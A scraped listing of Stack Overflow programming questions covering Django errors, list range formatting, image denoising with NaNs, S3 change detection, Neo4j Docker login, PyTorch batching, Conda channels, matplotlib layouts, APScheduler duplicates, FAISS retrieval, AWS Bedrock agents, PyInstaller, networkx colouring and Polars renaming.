originor__dev__app | The above exception was the direct cause of the following exception:
originor__dev__app |
originor__dev__app | Traceback (most recent call last):
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/core/handlers/exception.py", line 55, in inner
originor__dev__app | response = get_response(request)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/core/handlers/base.py", line 197, in _get_response
originor__dev__app | response = wrapped_callback(request, *callback_args, **callback_kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 688, in wrapper
originor__dev__app | return self.admin_site.admin_view(view)(*args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 134, in _wrapper_view
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/views/decorators/cache.py", line 62, in _wrapper_view_func
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/sites.py", line 242, in inner
originor__dev__app | return view(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1889, in change_view
originor__dev__app | return self.changeform_view(request, object_id, form_url, extra_context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 46, in _wrapper
originor__dev__app | return bound_method(*args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 134, in _wrapper_view
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1747, in changeform_view
originor__dev__app | return self._changeform_view(request, object_id, form_url, extra_context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1767, in _changeform_view
originor__dev__app | obj = self.get_object(request, unquote(object_id), to_field)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 866, in get_object
originor__dev__app | return queryset.get(**{field.name: object_id})
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 633, in get
originor__dev__app | num = len(clone)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 380, in __len__
originor__dev__app | self._fetch_all()
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 1881, in _fetch_all
originor__dev__app | self._result_cache = list(self._iterable_class(self))
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 91, in __iter__
originor__dev__app | results = compiler.execute_sql(
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/sql/compiler.py", line 1562, in execute_sql
originor__dev__app | cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 102, in execute
originor__dev__app | return super().execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 67, in execute
originor__dev__app | return self._execute_with_wrappers(
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 80, in _execute_with_wrappers
originor__dev__app | return executor(sql, params, many, context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/utils.py", line 91, in __exit__
originor__dev__app | raise dj_exc_value.with_traceback(traceback) from exc_value
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/psycopg/cursor.py", line 723, in execute
originor__dev__app | raise ex.with_traceback(None)
originor__dev__app | django.db.utils.DataError: invalid input syntax for type uuid: "ft_5479ca65374d401d9466d57fc95e4072"
originor__dev__app | LINE 1: ...familytree" WHERE "family_tree_familytree"."id" = 'ft_5479ca...
originor__dev__app | ^
</code></pre>
|
<python><django>
|
2025-01-16 16:29:28
| 0
| 9,922
|
Anuj TBE
|
79,362,317
| 2,082,769
|
Text representation of a list with gaps
|
<p>I have a list of integers that is sorted and contains no duplicates:</p>
<pre><code>mylist = [2, 5,6,7, 11,12, 19,20,21,22, 37,38, 40]
</code></pre>
<p>I want a summarized text representation that shows groups of adjacent integers in a compressed form as a hyphenated pair. To be specific: <em>Adjacent</em> implies magnitude differing by 1. So an integer <em>i</em> is considered to be adjacent to <em>j</em> if <em>j</em> = <em>i</em> ± 1. Recall that the list is sorted. That means that adjacent integers will appear in monotonically increasing series in the list.</p>
<p>So I want some elegant Python that will represent <code>mylist</code> as the string</p>
<pre><code>"2, 5-7, 11-12, 19-22, 37-38, 40,"
</code></pre>
<p>That is,</p>
<ul>
<li>an isolated integer (example: <code>2</code>, because the list contains neither <code>1</code> nor <code>3</code>) is represented as <code>2,</code></li>
<li>a group of adjacent integers (example: <code>19,20,21,22</code> because each member of the group differs from one other member by 1) is represented as <code>‹lowest›-‹highest›,</code> that is <code>19-22,</code>.</li>
</ul>
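<p>A rough attempt I have sketched - grouping on the difference between value and position - is below, but I am not convinced it is the elegant way:</p>
<pre><code>from itertools import groupby

def summarize(nums):
    parts = []
    # consecutive integers share the same value-minus-position offset
    for _, grp in groupby(enumerate(nums), key=lambda t: t[1] - t[0]):
        run = [value for _, value in grp]
        parts.append(str(run[0]) if len(run) == 1 else f"{run[0]}-{run[-1]}")
    return ", ".join(parts) + ","

print(summarize([2, 5, 6, 7, 11, 12, 19, 20, 21, 22, 37, 38, 40]))
# 2, 5-7, 11-12, 19-22, 37-38, 40,
</code></pre>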
<p>I can't believe this is a problem nobody has thought important enough to solve. Feel free to point me at a solution I have missed.</p>
|
<python>
|
2025-01-16 16:10:43
| 5
| 17,049
|
BoarGules
|
79,362,308
| 7,347,925
|
How to use skimage to denoise 2d array with nan values?
|
<p>I'm trying to apply the TV filter to a 2D array which includes many NaN values:</p>
<pre><code>from skimage.restoration import denoise_tv_chambolle
import numpy as np
import matplotlib.pyplot as plt
data_random = np.random.random ([100,100])*100
plt.imshow(data_random)
plt.imshow(denoise_tv_chambolle(data_random))
data_random[20:30, 50:60] = np.nan
data_random[30:40, 55:60] = np.nan
data_random[40:50, 65:75] = np.nan
plt.imshow(denoise_tv_chambolle(data_random))
</code></pre>
<p>The TV filter works well when all data are valid, but it returns an all-NaN array if there are NaN values.</p>
<h2>Original data:</h2>
<img src="https://i.sstatic.net/F5CZ1zVo.png" width="300" height="300"/>
<h2>Deonised data:</h2>
<img src="https://i.sstatic.net/WxqCnayw.png" width="300" height="300"/>
<h2>Data with nan values:</h2>
<img src="https://i.sstatic.net/8uHvulTK.png" width="300" height="300"/>
|
<python><numpy><image-processing><scikit-image><smoothing>
|
2025-01-16 16:09:05
| 1
| 1,039
|
zxdawn
|
79,362,157
| 5,316,326
|
Identify changed directories in Object Storage since a specific datetime with Python
|
<p>Having an S3 object storage, I want to know which directories in a base directory have changed since a given datetime.</p>
<p>It would work similar to <code>get_changed_directories</code>:</p>
<pre class="lang-py prettyprint-override"><code>bucket_directory = "your_bucket_name/base_directory"
since_datetime = datetime(2023, 1, 1, tzinfo=timezone.utc)
changed_dirs = get_changed_directories(s3_client, bucket_directory, since_datetime)
>>> ["your_bucket_name/base_directory/subdir_1", "your_bucket_name/base_directory/subdir_2", "your_bucket_name/base_directory/subdir_4"]
</code></pre>
<p>The <code>s3_client</code> can be any client; for example <code>boto3</code>, but async <code>aiboto3</code> or <code>s3fs</code> is usually faster.</p>
<p><strong>notes</strong></p>
<p>After some experiments, this seems to be the fastest method to list details in a directory:</p>
<pre class="lang-py prettyprint-override"><code>s3_file.ls(directory, detail=True, refresh=True)
</code></pre>
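<p>A synchronous <code>boto3</code> sketch of what <code>get_changed_directories</code> could look like: the paginator lists every object under the prefix and keeps the first-level sub-directory of any object modified after <code>since_datetime</code>. An async s3fs/aiobotocore version would follow the same listing-and-filtering idea.</p>
<pre class="lang-py prettyprint-override"><code>from datetime import datetime, timezone
import boto3

def get_changed_directories(s3_client, bucket_directory, since_datetime):
    bucket, _, prefix = bucket_directory.partition("/")
    changed = set()
    paginator = s3_client.get_paginator("list_objects_v2")
    for page in paginator.paginate(Bucket=bucket, Prefix=prefix):
        for obj in page.get("Contents", []):
            if obj["LastModified"] >= since_datetime:
                # first path component below the base directory
                rest = obj["Key"][len(prefix):].lstrip("/")
                subdir = rest.split("/", 1)[0]
                changed.add(f"{bucket}/{prefix}/{subdir}")
    return sorted(changed)

s3_client = boto3.client("s3")
changed_dirs = get_changed_directories(
    s3_client, "your_bucket_name/base_directory",
    datetime(2023, 1, 1, tzinfo=timezone.utc),
)
</code></pre>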
|
<python><boto3><object-storage><python-s3fs><aiobotocore>
|
2025-01-16 15:22:24
| 1
| 4,147
|
Joost Döbken
|
79,362,134
| 13,266,736
|
Docker Custom image neo4j, password login not working
|
<p>I have a custom docker image which looks like this:</p>
<pre class="lang-none prettyprint-override"><code>FROM neo4j:latest
# Copy the script into the container
COPY start-neo4j.sh /start-neo4j.sh
# Make the script executable
RUN chmod +x /start-neo4j.sh
# Run the script as the container's main command
CMD ["/start-neo4j.sh"]
</code></pre>
<p>The idea behind it is that it lets me create a Neo4j instance in Docker whose container does not stop when the database stops, and I would like to reuse this custom image later.
The startup script looks like this:</p>
<pre><code>#!/bin/bash
# Ensure any failure in the script stops the script
echo "Starting Neo4j with NEO4J_AUTH set to: $NEO4J_AUTH"
# Start Neo4j in the foreground
exec neo4j console
</code></pre>
<p>When I now run the docker container like this:</p>
<pre class="lang-none prettyprint-override"><code> -p 8123:7687 \
-p 8124:7474 \
-e NEO4J_AUTH=neo4j/1234567890 \
--user $(id -u):$(id -g) \
my-neo4j:latest
</code></pre>
<p>with my custom image. The container runs, but when I try to log in with the password 1234567890, authentication fails.</p>
<p>I have now sat at this for hours and can't understand what I did wrong, so any pointers are great!</p>
<p>My code to login:</p>
<pre class="lang-py prettyprint-override"><code>from neo4j import GraphDatabase
from neo4j.exceptions import ServiceUnavailable
def connect_to_neo4j(uri="bolt://localhost:8123", user="neo4j", password="1234567890"):
try:
# Create the driver
driver = GraphDatabase.driver(uri, auth=(user, password))
# Verify the connection
with driver.session() as session:
result = session.run("RETURN 'Connected!' as message")
print(result.single()['message'])
return driver
except ServiceUnavailable:
print("Failed to connect to Neo4j. Make sure the database is running.")
return None
except Exception as e:
print(f"An error occurred: {str(e)}")
return None
# Connect to the database
driver = connect_to_neo4j(password="1234567890")
# Don't forget to close the driver when you're done
if driver:
driver.close()
</code></pre>
<p>Which throws the error: <code>An error occurred: {code: Neo.ClientError.Security.Unauthorized} {message: The client is unauthorized due to authentication failure.}</code></p>
<p>And the logs from docker:</p>
<pre><code>Starting Neo4j with NEO4J_AUTH set to: neo4j/1234567890
Directories in use:
home: /var/lib/neo4j
config: /var/lib/neo4j/conf
logs: /logs
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses: /var/lib/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2025-01-16 15:15:53.874+0000 INFO Logging config in use: File '/var/lib/neo4j/conf/user-logs.xml'
2025-01-16 15:15:53.891+0000 INFO Starting...
2025-01-16 15:15:55.069+0000 INFO This instance is ServerId{76436336} (76436336-1904-4f6f-a898-71082cd5bf7e)
2025-01-16 15:15:56.335+0000 INFO ======== Neo4j 5.26.0 ========
2025-01-16 15:15:59.524+0000 INFO Anonymous Usage Data is being sent to Neo4j, see https://neo4j.com/docs/usage-data/
2025-01-16 15:15:59.610+0000 INFO Bolt enabled on 0.0.0.0:7687.
2025-01-16 15:16:00.315+0000 INFO HTTP enabled on 0.0.0.0:7474.
2025-01-16 15:16:00.316+0000 INFO Remote interface available at http://localhost:7474/
2025-01-16 15:16:00.319+0000 INFO id: F5093BC561A00396AE5C94FA9F710E9085F0EA09F30D6B5B087DE9CC1AF9C7EF
2025-01-16 15:16:00.319+0000 INFO name: system
2025-01-16 15:16:00.319+0000 INFO creationDate: 2025-01-16T15:15:57.733Z
2025-01-16 15:16:00.320+0000 INFO Started.
2025-01-16 15:16:03.399+0000 WARN [bolt-0] The client is unauthorized due to authentication failure.
</code></pre>
<p>thanks!</p>
|
<python><docker><neo4j>
|
2025-01-16 15:15:38
| 2
| 1,015
|
SebNik
|
79,361,940
| 24,696,572
|
Forward pass with all samples
|
<pre><code>import torch
import torch.nn as nn
class PINN(nn.Module):
def __init__(self, input_dim, output_dim, hidden_layers, neurons_per_layer):
super(PINN, self).__init__()
layers = []
layers.append(nn.Linear(input_dim, neurons_per_layer))
for _ in range(hidden_layers):
layers.append(nn.Linear(neurons_per_layer, neurons_per_layer))
layers.append(nn.Linear(neurons_per_layer, output_dim))
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
# Example: generating random input data
inputs = torch.rand((1000, 3)) # 3D input coordinates
model = PINN(input_dim=3, output_dim=3, hidden_layers=4, neurons_per_layer=64)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
epochs = 10000
for epoch in range(epochs):
optimizer.zero_grad()
nn_output = model(inputs) # Compute the NN prediction
# Compute e.g gradient of nn_output
loss.backward()
optimizer.step()
</code></pre>
<p>I want to implement a physics-informed NN where the inputs are <code>N</code> 3d points (x,y,z) and the NN output is a vector-valued quantitiy at this point, that is, both input dimension and output dimension are the same.</p>
<p>To calculate the loss at every epoch, I need the value of the quantity at all points. Example: for <code>N=1000</code> points, I need all <code>1000</code> NN predictions before I can proceed with the loss calculation.
In my code, I am basically giving a <code>1000x3</code> object to the input layer, assuming that PyTorch passes each row (<code>1x3</code>) separately to the network and at the end organizes the output again as a <code>1000x3</code> object.</p>
<p>Does pytorch work like that or do I have to rethink this approach?</p>
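<p>A small sanity-check sketch: <code>nn.Linear</code> (and hence a <code>nn.Sequential</code> stack of them) applies to the last dimension, so passing a <code>1000x3</code> tensor is one batched forward pass whose rows are processed independently and returned in the same order:</p>
<pre><code>import torch

lin = torch.nn.Linear(3, 3)
batch = torch.rand(1000, 3)

out_batched = lin(batch)                                 # one pass over all rows
out_rowwise = torch.stack([lin(row) for row in batch])   # row-by-row, for comparison

print(out_batched.shape)                                    # torch.Size([1000, 3])
print(torch.allclose(out_batched, out_rowwise, atol=1e-6))  # True
</code></pre>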
|
<python><machine-learning><pytorch>
|
2025-01-16 14:23:21
| 1
| 332
|
Mathieu
|
79,361,844
| 9,591,312
|
Issue with Conda Package Installation - Intel Channel Persistence
|
<h2>Environment</h2>
<ul>
<li>Using Miniconda for Python package management</li>
</ul>
<h2>Current Situation</h2>
<ol>
<li>All configured channels are visible in <code>conda info</code> output and Intel is removed:
<a href="https://i.sstatic.net/3b89XzlD.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3b89XzlD.jpg" alt="output of conda info" /></a></li>
<li>During package installation, Conda attempts to use the deprecated Intel channel
<a href="https://i.sstatic.net/fzbcEsN6.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fzbcEsN6.jpg" alt="fail conda installation" /></a></li>
<li>Installation fails due to the non-existent Intel channel</li>
</ol>
<h2>What I've Tried</h2>
<ul>
<li>Removed Intel channel from all configuration files</li>
<li>The channel still persists in Conda's configuration</li>
</ul>
<h2>Question</h2>
<p>How can I completely remove the Intel channel from Conda's configuration without reinstalling Conda?</p>
<h2>Additional Details</h2>
<ul>
<li>I previously used the Intel channel but it's no longer active</li>
<li>The channel remains configured despite removing it from <code>.condarc</code></li>
</ul>
<p>Please let me know if you need any additional information to help resolve this issue.</p>
|
<python><anaconda><intel><miniconda><mamba>
|
2025-01-16 13:52:29
| 0
| 647
|
BayesianMonk
|
79,361,674
| 11,751,799
|
Subplot four-pack under another subplot the size of the four-pack
|
<p>I want to make a <code>matplotlib</code> figure that has two components:</p>
<ol>
<li><p>A 2x2 "four pack" of subplots in the lower half of the figure</p>
</li>
<li><p>A subplot above the four pack that is the size of the four pack.</p>
</li>
</ol>
<p>I have seen <a href="https://stackoverflow.com/a/35881382/11751799">this</a> answer where subplots can have different dimensions. How can that approach be tweaked when there are multiple columns and rows, however? Or is a completely different approach warranted?</p>
<p>My final figure should be arranged something like this:</p>
<p><a href="https://i.sstatic.net/ndZxrcPN.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ndZxrcPN.png" alt="big plot above four pack" /></a></p>
<p>If there is a straightforward way to have a left-right orientation, shown below, that would be helpful, too.</p>
<p><a href="https://i.sstatic.net/nSqjcD7P.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/nSqjcD7P.png" alt="big plot left of four pack" /></a></p>
|
<python><matplotlib><plot><graph>
|
2025-01-16 13:01:03
| 2
| 500
|
Dave
|
79,361,450
| 10,889,650
|
django_apscheduler calls my job many times
|
<p>I have a scheduler python package with this main file:</p>
<pre><code>from apscheduler.schedulers.background import BackgroundScheduler
from django_apscheduler.jobstores import DjangoJobStore, register_events
from django.utils import timezone
from django_apscheduler.models import DjangoJobExecution
import sys
# This is the function you want to schedule - add as many as you want and then register them in the start() function below
def scheduled_function():
print("my function is running as scheduled")
def start():
scheduler = BackgroundScheduler()
scheduler.add_jobstore(DjangoJobStore(), "default")
scheduler.remove_all_jobs()
scheduler.add_job(scheduled_function, 'interval', seconds=10, name='scheduled_function', jobstore='default')
scheduler.start()
scheduler.print_jobs()
</code></pre>
<p>I call it from my apps.py like this:</p>
<pre><code>from django.apps import AppConfig
import os
class MyAppConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'my_server_app'
def ready(self):
if os.environ["RUN_MAIN"]:
from my_app.scheduler import scheduler
scheduler.start()
</code></pre>
<p>Despite calling remove_all_jobs, my function is called many times. For example, the output of my print_jobs call looks like this after I've restarted django a few times:</p>
<pre><code>Jobstore default:
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:01 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:02 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:03 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:04 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:05 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:05 UTC)
</code></pre>
<p>How can I fully clear the state of the scheduler whenever start is called?</p>
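<p>One common pattern (a sketch, not a guaranteed fix) is to give the job a stable <code>id</code> and pass <code>replace_existing=True</code>, so re-running <code>start()</code> overwrites the stored job instead of adding another copy; duplicates can also come from the Django autoreloader or multiple worker processes each calling <code>start()</code>:</p>
<pre><code>def start():
    scheduler = BackgroundScheduler()
    scheduler.add_jobstore(DjangoJobStore(), "default")
    scheduler.add_job(
        scheduled_function,
        "interval",
        seconds=10,
        id="scheduled_function",   # stable id: re-adding replaces instead of duplicating
        replace_existing=True,
        jobstore="default",
    )
    scheduler.start()
    scheduler.print_jobs()
</code></pre>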
|
<python><django><django-apscheduler>
|
2025-01-16 11:48:22
| 1
| 1,176
|
Omroth
|
79,361,321
| 19,959,092
|
How to improve faiss results?
|
<p>I am currently writing a program in which I need to retrieve information from a rag. this information should then be used by an llm. I am using FAISS in a python environment with the Langchain wrapper.</p>
<p>The data source is a document of regulations, which I split into individual texts based on the paragraphs. This ensures that the text is coherent for each topic.</p>
<p>However, I now have the problem that the database gives me quite strange results. If I ask the database (e.g. topic obs) how to peel a banana, I get results that deal, for example, with the best way to plant a kiwi.</p>
<p>Accordingly, the results don't help me much, and I'm wondering how I can improve them.</p>
<p>here is my code:</p>
<p>The input of the search method is usually one sentence containing a question.
The search method should then return one or two documents.</p>
<pre><code>import logging
import os
from pathlib import Path
import PyPDF2
from langchain_core.documents import Document
from langchain_community.document_loaders import TextLoader
from langchain_text_splitters import CharacterTextSplitter
from langchain_community.vectorstores import FAISS
from langchain_community.embeddings import HuggingFaceEmbeddings
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
filename="logs/api.log",
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
logger = logging.getLogger(__name__)
class FaissConnection:
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(FaissConnection, cls).__new__(cls)
cls._instance._initialize()
return cls._instance
def _initialize(self):
"""Initializes the FAISS connection, loading and processing the PDF."""
# Load and filter documents
character_chunks = self.get_regulation_chunks()
self.embeddings = HuggingFaceEmbeddings()
logging.info("Text split into %d chunks successfully.", len(character_chunks))
# Create FAISS index
self.db = FAISS.from_documents(character_chunks, self.embeddings)
logging.info("FAISS index created successfully.")
@staticmethod
def get_regulation_chunks() -> list[Document]:
"""Returns the regulation documents."""
documents = FaissConnection.get_regulation_documents()
logging.info("Text extracted from PDF file successfully. Total pages: %d", len(documents))
text_splitter = CharacterTextSplitter(separator="\n§")
character_chunks = text_splitter.split_documents(documents)
return character_chunks
@staticmethod
def get_regulation_documents() -> list[Document]:
"""Returns the regulation documents."""
current_file = Path(__file__).resolve()
project_root = current_file.parents[2]
pdf_path = project_root / "resources" / "document.pdf"
if not pdf_path or not os.path.exists(pdf_path):
raise FileNotFoundError("the file does not exist.")
documents = FaissConnection.load_pdf_from_file(pdf_path)
# filter all docs with less than 100 characters
documents = [doc for doc in documents if len(doc.page_content) > 100]
return documents
@staticmethod
def load_pdf_from_file(file_path: str) -> list[Document]:
"""Loads text from a PDF file."""
if not os.path.exists(file_path):
raise FileNotFoundError(f"The file {file_path} does not exist.")
documents = []
reader = PyPDF2.PdfReader(file_path)
progress_bar = tqdm(range(len(reader.pages)), desc="Reading PDF pages")
for page_num in progress_bar:
page = reader.pages[page_num]
text = page.extract_text()
document = Document(page_content=text)
documents.append(document)
return documents
def search(self, query, return_amount=1):
"""
Searches the FAISS index with the given query and returns the most relevant documents.
Args:
query (str): The search query.
return_amount (int): Number of documents to return.
Returns:
list[Document]: List of relevant documents.
"""
retriever = self.db.as_retriever(search_type="mmr")
retriever.search_kwargs["k"] = return_amount # Limit results
#docs = retriever.get_relevant_documents(query)
docs = retriever.invoke(query) #TODO:test difference
logging.info("Search query executed. Returning top %d result(s).", return_amount)
for doc in docs:
logging.info("Document: %s", doc.page_content)
return docs[0] if return_amount == 1 else docs
if __name__ == "__main__":
# Create the singleton instance
faiss_instance = FaissConnection()
# Example of using the singleton instance to retrieve relevant documents
relevant_docs = faiss_instance.search("How to peel a Banana?", return_amount=2)
</code></pre>
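<p>As a first debugging step, a small sketch that inspects the raw distances of the top hits via the LangChain FAISS wrapper's <code>similarity_search_with_score</code>; if even the best-scoring chunks are far away, the problem is more likely the embedding model or the chunking than the index itself:</p>
<pre><code># self.db is the FAISS vector store built above
results = self.db.similarity_search_with_score(query, k=5)
for doc, score in results:
    logging.info("score=%.3f | %s", score, doc.page_content[:80])
</code></pre>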
|
<python><langchain><faiss>
|
2025-01-16 11:00:29
| 0
| 428
|
Pantastix
|
79,361,227
| 3,491,759
|
I am getting "An error occurred (resourceNotFoundException) when calling the InvokeAgent operation: Knowledge Base with id 7M7ACWA9BQ does not exist"
|
<p>I am trying to invoke an agent I built in the agent builder. The agent works fine in the AWS console, and I was trying to call it using the Python code below.</p>
<pre><code>def invoke_agent(prompt: str):
"""
Sends a prompt for the agent to process and respond to.
:param agent_id: The unique identifier of the agent to use.
:param agent_alias_id: The alias of the agent to use.
:param session_id: The unique identifier of the session. Use the same value across requests
to continue the same conversation.
:param prompt: The prompt that you want Claude to complete.
:return: Inference response from the model.
"""
agents_runtime_client = boto3.client('bedrock-agent-runtime',
aws_access_key_id=all_values['aws_access_key_id'],
aws_secret_access_key=all_values['aws_secret_access_key'],
region_name="us-east-1")
try:
# Note: The execution time depends on the foundation model, complexity of the agent,
# and the length of the prompt. In some cases, it can take up to a minute or more to
# generate a response.
response = agents_runtime_client.invoke_agent(
agentId='**********',
agentAliasId='**********',
sessionId='session_id',
inputText=prompt,
)
completion = ""
for event in response.get("completion"):
chunk = event["chunk"]
completion = completion + chunk["bytes"].decode()
except ClientError as e:
logger.error(f"Couldn't invoke agent. {e}")
raise e
return completion
</code></pre>
<p>but I keep getting this error with the ending part of stack trace below</p>
<pre><code>File "/opt/homebrew/lib/python3.11/site-packages/botocore/eventstream.py", line 619, in _parse_event
raise EventStreamError(parsed_response, self._operation_name)
botocore.exceptions.EventStreamError: An error occurred (resourceNotFoundException) when calling the InvokeAgent operation: Knowledge Base with id 7M7ACWA9BQ does not exist
</code></pre>
<p>The error is even more confusing because the message <code>Knowledge Base with id 7M7ACWA9BQ does not exist</code> is strange: I don't have a knowledge base attached, and the agent works fine in the AWS console (in the Bedrock playground where I set the agent up). I had set the agent up earlier with a knowledge base, which I removed when the OpenSearch cost became too much to keep, but I'm not sure it had that ID either, since I removed it long before I started writing code to invoke the agent. I have since added a knowledge base to the agent, but the error still occurs.</p>
<p>What am I doing wrong and how to solve it?</p>
|
<python><amazon-web-services><artificial-intelligence><boto3><amazon-bedrock>
|
2025-01-16 10:39:55
| 1
| 441
|
olyjosh
|
79,361,220
| 3,070,181
|
Why does pyinstaller generated exe fail with module not found giving a strange module name?
|
<p>I am running pyinstaller 6.8.0 on Windows 10</p>
<p>my application runs correctly when called from the terminal (python .../main.py)</p>
<p>I can build it using pyinstaller with no error messages</p>
<p>When I run the exe it fails with the error</p>
<blockquote>
<p>File "psiconfig\toml_config.py", line 2, in
ModuleNotFoundError: No module named '3c22db458360489351e4__mypyc'</p>
</blockquote>
<p>Line 2 of toml_config.py is:</p>
<p>import toml</p>
<p>If I run the Python REPL, I am able to import tomli with no errors.</p>
<p>this is my spec file</p>
<pre><code># -*- mode: python ; coding: utf-8 -*-
a = Analysis(
['C:\\Users\\jeffw\\projects\\basic_app\\basic_app\\src\\main.py'],
pathex=[],
binaries=[],
datas=[('basic_app/images/icon.png', 'images')],
hiddenimports=['tomli'],
hookspath=[],
hooksconfig={},
runtime_hooks=[],
excludes=[],
noarchive=False,
optimize=0,
)
pyz = PYZ(a.pure)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.datas,
[],
name='BasicApp.exe',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=False,
disable_windowed_traceback=False,
argv_emulation=False,
target_arch=None,
codesign_identity=None,
entitlements_file=None,
icon=['basic_app\\images\\icon.ico'],
)
</code></pre>
<p>How do I solve this?</p>
|
<python><pyinstaller>
|
2025-01-16 10:37:09
| 3
| 3,841
|
Psionman
|
79,360,975
| 12,466,687
|
How to color nodes in network graph based on categories in networkx python?
|
<p>I am trying to create a <strong>network graph</strong> on <strong>correlation data</strong> and would like to <strong>color the nodes based on categories</strong>.</p>
<p><strong>Data sample view:</strong>
<a href="https://i.sstatic.net/KnVonnbG.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/KnVonnbG.png" alt="enter image description here" /></a></p>
<p><strong>Data</strong>:</p>
<pre><code>import pandas as pd
links_data = pd.read_csv("https://raw.githubusercontent.com/johnsnow09/network_graph/refs/heads/main/links_filtered.csv")
</code></pre>
<p><strong>graph code:</strong></p>
<pre><code>import networkx as nx
G = nx.from_pandas_edgelist(links_data, 'var1', 'var2')
# Plot the network:
nx.draw(G, with_labels=True, node_color='orange', node_size=200, edge_color='black', linewidths=.5, font_size=2.5)
</code></pre>
<p><a href="https://i.sstatic.net/AWnxSV8J.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/AWnxSV8J.png" alt="enter image description here" /></a></p>
<p>All the nodes in this network graph are colored orange, but I would like to <strong>color them</strong> based on the <code>Category</code> variable. I have looked for more examples but am not sure how to do it.</p>
<p>I am also open to using other python libraries if required.</p>
<p>Appreciate any help here !!</p>
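<p>A sketch of one way to do this with plain networkx, assuming <code>links_data</code> has a <code>Category</code> column describing <code>var1</code> (the column names and category labels here are placeholders to adapt):</p>
<pre><code>import matplotlib.pyplot as plt
import networkx as nx

G = nx.from_pandas_edgelist(links_data, 'var1', 'var2')

# Map each node to its category, then each category to a colour
cat_by_node = dict(zip(links_data['var1'], links_data['Category']))
palette = {'category_a': 'tab:orange', 'category_b': 'tab:blue'}  # hypothetical categories
node_colors = [palette.get(cat_by_node.get(n), 'tab:gray') for n in G.nodes()]

nx.draw(G, with_labels=True, node_color=node_colors, node_size=200,
        edge_color='black', linewidths=.5, font_size=2.5)
plt.show()
</code></pre>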
|
<python><networkx>
|
2025-01-16 09:24:11
| 1
| 2,357
|
ViSa
|
79,360,971
| 2,287,458
|
Rename all columns to lowercase in Polars dataframe
|
<p>Given a <code>polars</code> dataframe I want to rename all columns to their lowercase version. As per <a href="https://docs.pola.rs/api/python/stable/reference/expressions/api/polars.Expr.name.to_lowercase.html" rel="nofollow noreferrer">polars.Expr.name.to_lowercase</a> we can do</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl
pl.DataFrame([{'CCY': 'EUR', 'Qty': 123},
{'CCY': 'USD', 'Qty': 456}]).with_columns(pl.all().name.to_lowercase())
</code></pre>
<p>but this duplicates the data (as it keeps the original column names).</p>
<p>Conceptually, I am looking for something like</p>
<pre class="lang-py prettyprint-override"><code>pl.DataFrame(...).rename({c: c.name.to_lowercase() for c in pl.all()})
</code></pre>
<p>But this doesn't work since <code>pl.all()</code> is not iterable.</p>
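<p>For comparison, a minimal sketch that drives <code>rename</code> from <code>df.columns</code> (a plain list of strings) rather than from an expression:</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl

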